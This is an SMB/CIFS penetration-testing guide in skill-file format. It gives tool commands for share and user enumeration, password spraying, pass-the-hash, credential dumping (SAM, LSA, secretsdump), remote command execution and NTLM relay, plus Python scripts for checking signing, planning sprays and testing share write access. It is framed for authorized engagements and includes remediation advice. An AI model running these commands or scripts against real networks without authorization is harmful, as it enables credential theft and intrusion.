pentesting-smb


Testing SMB/CIFS file-sharing services (TCP 445, and 139 over NetBIOS) on Windows and Samba hosts during authorized engagements. Covers share enumeration, null/guest session abuse, user and RID enumeration, credentialed access with netexec/crackmapexec, password spraying, command execution (psexec/wmiexec/smbexec/atexec), SAM/LSA dumping, and notable CVEs such as EternalBlue (MS17-010).

By xalgord. Updated 6/6/2026.

---
name: pentesting-smb
description: Testing SMB/CIFS file-sharing services (TCP 445, and 139 over NetBIOS) on Windows and Samba hosts during authorized engagements. Covers share enumeration, null/guest session abuse, user and RID enumeration, credentialed access with netexec/crackmapexec, password spraying, command execution (psexec/wmiexec/smbexec/atexec), SAM/LSA dumping, and notable CVEs such as EternalBlue (MS17-010).
domain: cybersecurity
subdomain: network-services-pentesting
tags:
  - penetration-testing
  - network-services
  - smb
  - cifs
  - active-directory
  - lateral-movement
version: '1.0'
author: xalgorix
license: Apache-2.0
---

Pentesting SMB (port 445/139)

When to Use

  • During authorized internal network or Active Directory penetration tests when TCP 445 or 139 is open
  • When you need to enumerate shares, users, groups, and the domain password policy
  • When testing for anonymous/null sessions, guest access, and default credentials
  • When you have credentials (or NT hashes) and want to access shares, dump secrets, or move laterally
  • When assessing Samba servers on Linux/Unix for dangerous smb.conf misconfigurations

Quick Enumeration

# Version and vuln scan (also fingerprints OS)
nmap --script "safe or smb-enum-*" -p 445 <IP>
nmap --script smb-os-discovery,smb-security-mode,smb2-security-mode -p 445 <IP>
nmap --script smb-vuln-ms17-010 -p 445 <IP>          # EternalBlue check

# Full enumeration via null/anon IPC$ session
enum4linux -a <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>

# netexec / crackmapexec (the modern workhorse)
netexec smb <IP>                                     # banner, signing, domain, OS
crackmapexec smb <IP> -u '' -p '' --shares           # null session shares
crackmapexec smb <IP> -u 'guest' -p '' --shares      # guest session shares

# rpcclient null session
rpcclient -U "" -N <IP>

Critical: Checks Most Often Missed

  1. Null / anonymous session on IPC$ — connect with empty user and password. Often still yields OS info, parent domain, users, groups, shares, and the password policy via enum4linux/enum4linux-ng.
  2. Guest account access — guest with a blank password frequently lists shares even when null does not.
  3. SMB signing not required — enables SMB relay (NTLM relay) attacks. netexec smb <IP> reports signing:False.
  4. EternalBlue (MS17-010) — unpatched SMBv1 remote code execution. Confirm with nmap --script smb-vuln-ms17-010 or crackmapexec smb <IP> -M ms17-010. Do NOT run the exploit without explicit written authorization; the kernel pool overflow can crash the host.
  5. Readable SYSVOL/NETLOGON — readable by all authenticated domain users. Hunt for GPP XML files (Groups.xml with a cpassword attribute, Registry.xml with autologon passwords), web.config, and logon scripts with embedded creds. Also test write access even on "read-only"-looking shares (NTFS ACLs may allow writes → logon-script poisoning).
  6. NTFS vs share ACL mismatch — a share that looks read-only may still allow file writes. Always test by uploading a small file.

How to CONFIRM: a null session is confirmed when smbclient -U '%' -N \\\\<IP>\\IPC$ -c '' returns no error, or crackmapexec smb <IP> -u '' -p '' --shares lists shares. Treat NT_STATUS_ACCESS_DENIED as "share exists, no access" and NT_STATUS_BAD_NETWORK_NAME as "share does not exist."
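The signing check in item 3 comes straight from the SecurityMode field of the server's SMB2 NEGOTIATE response, which is what netexec summarises as signing:True/False. The following added example (not part of the original skill, and not netexec or impacket code) builds a raw SMB2 NEGOTIATE, sends it over TCP 445 and decodes that field, so the finding can be confirmed without any third-party tool. It deliberately offers dialects only up to 3.0.2 (3.1.1 needs negotiate contexts this minimal probe does not build); the `fake_negotiate_response` helper is a constructed response used only for offline testing.

```python
"""Added example: raw SMB2 NEGOTIATE probe for the SMB-signing check."""
import socket
import struct
import sys
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SIGNING_ENABLED = 0x0001    # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002   # SMB2_NEGOTIATE_SIGNING_REQUIRED
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}


def smb2_header(command, message_id=0):
    """64-byte SMB2 header (MS-SMB2 2.2.1), little-endian, unsigned."""
    return struct.pack("<4sHHIHHIIQIIQ16s",
                       SMB2_MAGIC, 64, 0, 0, command, 0, 0, 0,
                       message_id, 0, 0, 0, b"\x00" * 16)


def build_negotiate():
    """NetBIOS-framed SMB2 NEGOTIATE offering dialects 2.0.2 .. 3.0.2 (no contexts)."""
    dialects = (0x0202, 0x0210, 0x0300, 0x0302)
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED,
                       0, 0, uuid.uuid4().bytes, 0)        # ClientGuid is random per run
    body += b"".join(struct.pack("<H", d) for d in dialects)
    msg = smb2_header(SMB2_NEGOTIATE) + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg    # NetBIOS session message header


def parse_negotiate_response(msg):
    """Decode dialect and SecurityMode from an SMB2 NEGOTIATE response (MS-SMB2 2.2.4)."""
    if len(msg) < 70 or msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message (SMB1-only host, or not SMB at all)")
    status, command = struct.unpack_from("<IH", msg, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError(f"negotiate rejected: NT status 0x{status:08x}")
    size, security_mode, dialect = struct.unpack_from("<HHH", msg, 64)
    if size != 65:
        raise ValueError(f"unexpected NEGOTIATE response StructureSize {size}")
    return {
        "dialect": DIALECTS.get(dialect, f"0x{dialect:04x}"),
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def relay_verdict(info):
    """NTLM relay to this host only works when the server does not require signing."""
    if info["signing_required"]:
        return "signing required: not a relay target"
    return "signing NOT required: NTLM relay candidate (ntlmrelayx target)"


def fake_negotiate_response(security_mode, dialect=0x0302):
    """Constructed response for offline testing; same layout as a real server reply."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       b"\x00" * 16, 0, 0, 0, 0, 0, 0, 0, 0, 0)
    return smb2_header(SMB2_NEGOTIATE) + body


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf


def probe(host, port=445, timeout=5.0):
    """Connect, negotiate, and return the decoded SecurityMode for host."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate())
        nb = _recv_exact(s, 4)                          # NetBIOS header: type + 3-byte length
        return parse_negotiate_response(_recv_exact(s, int.from_bytes(nb[1:], "big")))


if __name__ == "__main__":
    info = probe(sys.argv[1])
    print(f"{sys.argv[1]}: SMB {info['dialect']} signing_enabled={info['signing_enabled']} "
          f"signing_required={info['signing_required']} -> {relay_verdict(info)}")
```

Run it as `python3 smb_signing_probe.py <IP>`. A host that answers the request with an SMB1 header, or not at all, is flagged by `parse_negotiate_response` rather than misreported as "signing not required"; such hosts are the ones to check with `smb-security-mode` and the MS17-010 script instead.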

Workflow

Step 1: Enumerate (shares, users, domain info)

# Shares (try null, then guest, then creds)
smbclient --no-pass -L //<IP>                         # null user
smbmap -H <IP>                                        # null user, shows perms
crackmapexec smb <IP> -u '' -p '' --shares

# Users / groups / password policy
crackmapexec smb <IP> --users [-u <user> -p <pass>]
crackmapexec smb <IP> --groups [-u <user> -p <pass>]
crackmapexec smb <IP> -u <user> -p <pass> --pass-pol
rpcclient -U "" -N <IP> -c 'enumdomusers'
rpcclient -U "" -N <IP> -c 'enumdomgroups'

# RID cycling / SID lookup to recover usernames
lookupsid.py -no-pass <DOMAIN>/@<IP>
crackmapexec smb <IP> -u 'guest' -p '' --rid-brute

Step 2: Authenticate (null session, default creds, password spray)

# Default / weak creds worth trying: blank, guest/blank, admin/(blank|password|admin)

# Validate a single credential pair
crackmapexec smb <IP> -u 'user' -p 'Password1'         # (+) = valid, Pwn3d! = admin

# Password spray across a user list (mind lockout policy!)
crackmapexec smb <IP> -u users.txt -p 'Spring2024!' --continue-on-success

# Pass-the-Hash
crackmapexec smb <IP> -u Administrator -H <NTHASH>
smbmap -u "username" -p "<LM>:<NT>" -H <IP>            # PtH with smbmap (LM:NT order; use aad3b435b51404eeaad3b435b51404ee as the LM half)

# Kerberos auth (NTLM disabled environments → STATUS_NOT_SUPPORTED)
sudo ntpdate <dc.fqdn>                                 # avoid KRB_AP_ERR_SKEW
netexec smb <dc.fqdn> -k                               # use ccache TGT
smbclient --kerberos //ws01.domain.com/C$              # -k; on newer Samba use --use-kerberos=required
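The "mind lockout policy!" warning in the spray command is easy to get wrong by hand. The following added example (not part of the original skill) reads the lockout threshold and reset window out of `--pass-pol` output and turns a password list into batches that stay below the threshold for every user, with the required waits between batches, emitting the netexec command lines. The `SAMPLE_PASS_POL` text is a constructed sample: its field names follow crackmapexec/netexec's `--pass-pol` output, but exact spacing and wording differ between versions, so adjust the two regexes if yours looks different.

```python
"""Added example: lockout-aware password-spray planner driven by --pass-pol output."""
import re
import shlex
from dataclasses import dataclass

# Constructed sample of crackmapexec/netexec --pass-pol output (trimmed).
SAMPLE_PASS_POL = """\
SMB   10.10.10.10  445  DC01  [+] Dumping password info for domain: CORP
SMB   10.10.10.10  445  DC01  Minimum password length: 8
SMB   10.10.10.10  445  DC01  Password history length: 24
SMB   10.10.10.10  445  DC01  Reset Account Lockout Counter: 30 minutes
SMB   10.10.10.10  445  DC01  Locked Account Duration: 30 minutes
SMB   10.10.10.10  445  DC01  Account Lockout Threshold: 5
"""


@dataclass
class LockoutPolicy:
    threshold: int        # failed attempts that trigger lockout; 0 = never locks
    reset_minutes: int    # window after which a user's bad-password counter resets


def parse_pass_pol(text):
    """Pull the two lockout values out of --pass-pol output ('None' = lockout disabled)."""
    m = re.search(r"Account Lockout Threshold:\s*(\d+|None)", text)
    if not m:
        raise ValueError("lockout threshold not found in --pass-pol output")
    threshold = 0 if m.group(1) == "None" else int(m.group(1))
    r = re.search(r"Reset Account Lockout Counter:\s*(\d+)\s*minute", text)
    return LockoutPolicy(threshold, int(r.group(1)) if r else 0)


def plan_spray(policy, passwords, margin=2):
    """Split passwords into batches of at most threshold - margin per reset window.

    One password is tried against every user before the next, so each user
    takes exactly one failure per password; margin leaves room for users'
    own typos during the window. Returns [(wait_minutes_before, [passwords])].
    """
    passwords = list(passwords)
    if policy.threshold == 0:
        return [(0, passwords)]
    per_window = max(1, policy.threshold - margin)
    batches = []
    for i in range(0, len(passwords), per_window):
        wait = 0 if i == 0 else policy.reset_minutes
        batches.append((wait, passwords[i:i + per_window]))
    return batches


def render_commands(batches, target, users_file="users.txt"):
    """netexec invocations plus sleeps, one password per run, ready for a shell script."""
    lines = []
    for wait, pws in batches:
        if wait:
            lines.append(f"sleep {wait * 60 + 60}   # reset window + 1 min slack")
        for pw in pws:
            lines.append(f"netexec smb {target} -u {users_file} -p {shlex.quote(pw)} "
                         "--continue-on-success")
    return lines


if __name__ == "__main__":
    policy = parse_pass_pol(SAMPLE_PASS_POL)
    wordlist = ["Spring2024!", "Summer2024!", "Autumn2024!", "Winter2024!"]
    print(f"# threshold={policy.threshold} reset={policy.reset_minutes}m")
    print("\n".join(render_commands(plan_spray(policy, wordlist), "10.10.10.0/24")))
```

The reset window is counted from each user's last failed attempt, so the sleep only starts after the batch has finished; for a large user list, add the batch's own run time to the wait rather than trusting the counter to have reset mid-run.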

Step 3: Exploit / Extract (share access, secrets dumping)

# Connect to a share and pull files
smbclient --no-pass //<IP>/<Share>
smbclient //<IP>/<share> -c 'recurse; prompt; mget *'  # download everything
smbmap -R <Share> -H <IP> -A '<FileName>' -q           # search + download

# Try common hidden shares
smbclient -U '%' -N \\\\<IP>\\ADMIN$                    # also C$, IPC$, SYSVOL, NETLOGON

# Spider shares for secrets
crackmapexec smb <IP> -u user -p pass -M spider_plus --share 'Department Shares'

# Dump credentials with valid (admin) creds
crackmapexec smb <IP> -u Administrator -p 'pass' --sam   # local SAM hashes
crackmapexec smb <IP> -u Administrator -p 'pass' --lsa   # LSA secrets
secretsdump.py [[domain/]username[:password]@]<IP>       # impacket full dump

# Remote registry read
reg.py domain.local/USERNAME@<IP> -hashes <LM:NT> query -keyName HKLM -s
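Items 5 and 6 of the critical checks both come down to the same test: list the shares, then confirm read and write access per share with a real upload rather than trusting what the listing says. The following added example (not part of the original skill, and not smbmap or netexec code) drives `smbclient` to do exactly that: it parses `smbclient -L` output, then for every disk share runs `ls` and a `put`/`del` of a small marker file, classifying the NT_STATUS codes the way the "How to CONFIRM" note describes. It assumes `smbclient` is on PATH for the live probes; `SAMPLE_LIST` is a constructed listing used only for offline testing of the parser.

```python
"""Added example: share read/write triage on top of smbclient."""
import os
import re
import subprocess
import sys
import tempfile

# Constructed sample of the share table printed by `smbclient -L //<IP> -N`.
SAMPLE_LIST = """\
\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tNETLOGON        Disk      Logon server share
\tSYSVOL          Disk      Logon server share
\tDept Shares     Disk      Department data
SMB1 disabled -- no workgroup available
"""

# Non-greedy name so share names containing spaces ("Dept Shares") still parse.
SHARE_LINE = re.compile(r"^\s*(.+?)\s+(Disk|IPC|Printer)\s*(.*?)\s*$")


def parse_share_list(text):
    """Return [(name, type, comment)] from smbclient -L output."""
    return [m.groups() for m in (SHARE_LINE.match(l) for l in text.splitlines()) if m]


def classify(returncode, output):
    """Map smbclient's exit status and NT_STATUS text to a triage verdict."""
    if "NT_STATUS_BAD_NETWORK_NAME" in output:
        return "absent"            # share does not exist
    if "NT_STATUS_LOGON_FAILURE" in output:
        return "auth-failed"
    if "NT_STATUS_ACCESS_DENIED" in output:
        return "denied"            # share exists; this identity cannot do this operation
    if "NT_STATUS_MEDIA_WRITE_PROTECTED" in output:
        return "read-only"         # Samba's answer to a write on a read only = yes share
    if "NT_STATUS_" in output or returncode != 0:
        return "error"
    return "ok"


def smbclient(args, timeout=30):
    p = subprocess.run(["smbclient", *args], capture_output=True, text=True, timeout=timeout)
    return p.returncode, p.stdout + p.stderr


def auth_args(user, password):
    """smbclient takes -U 'user%pass'; empty user and password is a null session."""
    return ["-U", f"{user}%{password}"] + (["-N"] if not password else [])


def probe_share(host, share, user="", password=""):
    """Return (read, write) verdicts for //host/share; write is only probed after a readable ls."""
    base = [f"//{host}/{share}", *auth_args(user, password)]
    read = classify(*smbclient(base + ["-c", "ls"]))
    if read != "ok":
        return read, "skipped"
    marker = f"acl-probe-{os.getpid()}.txt"
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("write-probe\n")
        local = f.name
    try:   # upload then delete: a write=ok on a "read-only" share is the NTFS/share ACL mismatch
        write = classify(*smbclient(base + ["-c", f"put {local} {marker}; del {marker}"]))
    finally:
        os.unlink(local)
    return read, write


def triage(host, user="", password=""):
    """{share: (read, write)} for every disk share the given identity can list."""
    rc, out = smbclient(["-L", f"//{host}", *auth_args(user, password)])
    if classify(rc, out) != "ok":
        raise RuntimeError(f"share listing failed: {out.strip()}")
    return {name: probe_share(host, name, user, password)
            for name, kind, _ in parse_share_list(out) if kind == "Disk"}


if __name__ == "__main__":
    host, user, password = (sys.argv[1:] + ["", ""])[:3]
    for share, (r, w) in triage(host, user, password).items():
        print(f"{share:<20} read={r:<12} write={w}")
```

Invoke as `python3 share_triage.py <IP>` for a null session or `python3 share_triage.py <IP> <user> <pass>` with credentials, and run it again per access level (null, guest, authenticated), since the answer changes with the identity. The marker file is deleted immediately, but note the filename in the engagement log in case `del` fails on a write-only drop folder.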

Step 4: Post-access / lateral movement

# Command execution (default exec method is wmiexec; others are selectable with --exec-method)
crackmapexec smb <IP> -u Administrator -p 'pass' -x whoami
crackmapexec smb <IP> -u Administrator -H <NTHASH> -x whoami
# --exec-method {mmcexec,smbexec,atexec,wmiexec}

# Impacket interactive shells (kali: /usr/share/doc/python3-impacket/examples/)
psexec.py [[domain/]username[:password]@]<IP>            # new service via \pipe\svcctl
wmiexec.py [[domain/]username[:password]@]<IP>           # DCOM over port 135; no service dropped, but output is read back via ADMIN$ unless -nooutput
smbexec.py [[domain/]username[:password]@]<IP>           # cmd/powershell via service
atexec.py  [[domain/]username[:password]@]<IP> "whoami"  # Task Scheduler \pipe\atsvc
# All support -hashes <LM:NT> for PtH and -k for Kerberos

# SMB relay (when signing not required) — capture + relay NTLM
ntlmrelayx.py -tf targets.txt -smb2support

Key Concepts

| Concept | Description |
|---------|-------------|
| SMB / CIFS | Application-layer protocol for shared access to files, printers, and named pipes; runs on TCP 445 (direct) or 139 (NetBIOS) |
| Null session | Anonymous IPC$ connection with empty username/password; exposes services over named pipes |
| IPC$ | Inter-process communication share used to interact with named pipes (lsarpc, samr, srvsvc) |
| Pass-the-Hash (PtH) | Authenticating with an NT hash instead of a cleartext password |
| SMB signing | Integrity protection; when not required, NTLM relay attacks become possible |
| RID cycling | Enumerating users by brute-forcing relative IDs (500–~1100) via SID lookups |
| SYSVOL/NETLOGON | Domain shares readable by authenticated users; common source of GPP/script credentials |
| EternalBlue (MS17-010) | SMBv1 kernel pool overflow giving unauthenticated remote code execution |

Tools & Systems

| Tool | Purpose |
|------|---------|
| nmap (smb-* NSE) | Version detection, security mode, MS17-010 vuln check |
| netexec / crackmapexec | Share/user/group enum, spraying, PtH, secrets dump, command exec |
| enum4linux-ng | Aggregated null-session enumeration (OS, domain, users, shares, policy) |
| rpcclient | Manual MSRPC queries (enumdomusers, enumdomgroups, queryuser) |
| smbclient / smbmap | Share listing, file transfer, recursive search and download |
| impacket | psexec/wmiexec/smbexec/atexec, secretsdump, samrdump, lookupsid, reg, ntlmrelayx |
| Snaffler / ShareHound | Automated discovery of sensitive files and share ACLs across the domain |

Common Scenarios

Scenario 1: Anonymous Enumeration

A host allows null sessions. enum4linux-ng -A <IP> reveals the domain name, full user list, group memberships, and password policy — providing a user list for targeted password spraying.

Scenario 2: GPP Password in SYSVOL

A domain user can read \\<dc>\SYSVOL\<domain>\Policies\...\Registry.xml containing an autologon password configured via Group Policy, granting workstation access.

Scenario 3: Pass-the-Hash Lateral Movement

A dumped local Administrator NT hash is reused across the subnet. crackmapexec smb <subnet> -u Administrator -H <hash> flags hosts as Pwn3d!, and wmiexec.py -hashes :<hash> Administrator@<IP> yields a shell.

Scenario 4: EternalBlue Target

nmap --script smb-vuln-ms17-010 flags an unpatched server. With written authorization, the host is exploited for SYSTEM-level RCE; otherwise it is reported as a critical finding only.

Output Format

## SMB Finding

**Service**: SMB/CIFS
**Severity**: <Critical|High|Medium|Low>
**Host**: <IP>:445
**Access Level**: <null | guest | authenticated | admin>

### Summary
<What was found: null session, weak creds, MS17-010, exposed share, etc.>

### Evidence
- Command: <exact command run>
- Output: <relevant signature, e.g. share list, "Pwn3d!", root: line, MS17-010 VULNERABLE>

### Affected Resources
| Share / Object | Access | Notable Contents |
|----------------|--------|------------------|
| SYSVOL | read | Registry.xml with GPP password |
| C$ | read/write (admin) | full filesystem |

### Reproduction Steps
1. <step>
2. <step>

### Recommendation
1. Disable null/anonymous sessions and the guest account
2. Require SMB signing on all hosts
3. Patch MS17-010 / disable SMBv1
4. Remove credentials from SYSVOL scripts and GPP; rotate exposed secrets
5. Enforce strong, unique local administrator passwords (LAPS)